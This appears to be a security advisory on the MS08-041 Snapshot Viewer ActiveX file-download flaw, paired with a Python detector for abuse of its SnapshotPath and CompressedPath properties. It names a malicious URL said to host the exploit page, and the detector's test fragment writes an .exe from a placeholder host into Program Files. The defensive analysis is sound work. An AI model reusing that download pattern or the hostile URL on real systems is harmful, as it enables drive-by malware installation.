Snapshot Viewer Vulnerability: Snapview.ocx Remote Code Execution Exploit

References:
1) Microsoft Security Bulletin MS08-041 - Critical Vulnerability in the ActiveX Control for the Snapshot Viewer

2) Microsoft Snapshot Viewer ActiveX Control Arbitrary File Upload Vulnerability

Technical Information: The vulnerability is due to an error in the Snapshot Viewer ActiveX control (snapview.ocx) when processing certain string values. The ActiveX control fails to properly sanitize user-supplied input passed to the SnapshotPath and CompressedPath properties. An attacker can use the SnapshotPath property to specify a file and the CompressedPath property to place a file in a known location.

3) More SQL Injections - very active right now

The office.htm file exploits the Snapshot Viewer vulnerability. http://www.plgou.com/csrss/office.htm

Code Excerpt
Once the ActiveX object has been set, the script uses the CompressedPath property string to download the non-whitelisted wsv.exe file to the Program Files directory, unless protection intervenes:
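
A defensive check built on the two property names described above, as an added example that is not part of the original page or the exploit file: it flags script that assigns a remote SnapshotPath together with a CompressedPath ending in an executable extension. The extension list, severity labels, function names and sample fragments are assumptions constructed for illustration.

```python
import re

# Property names come from the advisory text; everything else is an assumption.
ASSIGN = re.compile(
    r"""\.\s*(SnapshotPath|CompressedPath)\s*=\s*(["'])(.*?)\2""", re.IGNORECASE
)
# Remote sources: URL schemes or a UNC path.
REMOTE = re.compile(r"^(?:https?|ftp)://|^\\\\", re.IGNORECASE)
# Extensions treated as executable content (assumed, non-exhaustive list).
EXEC_EXT = (".exe", ".dll", ".scr", ".bat", ".cmd", ".com", ".vbs", ".hta", ".pif")


def unescape_js(value):
    """Undo JavaScript backslash doubling so paths compare cleanly."""
    return value.replace("\\\\", "\\").replace("\\/", "/")


def scan(page_text):
    """Return a list of (severity, property, value, reason) findings."""
    findings = []
    for match in ASSIGN.finditer(page_text):
        prop = match.group(1).lower()
        value = unescape_js(match.group(3)).strip()
        lowered = value.lower()
        if prop == "snapshotpath" and REMOTE.search(value):
            findings.append(("medium", "SnapshotPath", value, "remote source file"))
        elif prop == "compressedpath" and lowered.endswith(EXEC_EXT):
            findings.append(("high", "CompressedPath", value, "writes executable file type"))
        elif prop == "compressedpath" and not lowered.endswith(".snp"):
            findings.append(("low", "CompressedPath", value, "non-snapshot destination"))
    return findings


def verdict(page_text):
    """Collapse findings to one label; both properties together is the strong signal."""
    found = scan(page_text)
    props = {f[1] for f in found}
    if props == {"SnapshotPath", "CompressedPath"} and any(f[0] == "high" for f in found):
        return "block"
    return "review" if found else "clean"


# Constructed fragments (not taken from office.htm); example.invalid is a placeholder.
SUSPICIOUS = '''
viewer.SnapshotPath = "http://example.invalid/sample.bin";
viewer.CompressedPath = "C:/Program Files/wsv.exe";
'''
BENIGN = 'viewer.SnapshotPath = "reports/q2.snp";'

if __name__ == "__main__":
    for name, text in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, verdict(text), scan(text))
```

String matching of this kind misses obfuscated or dynamically built property values, so it complements rather than replaces the fix in MS08-041.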
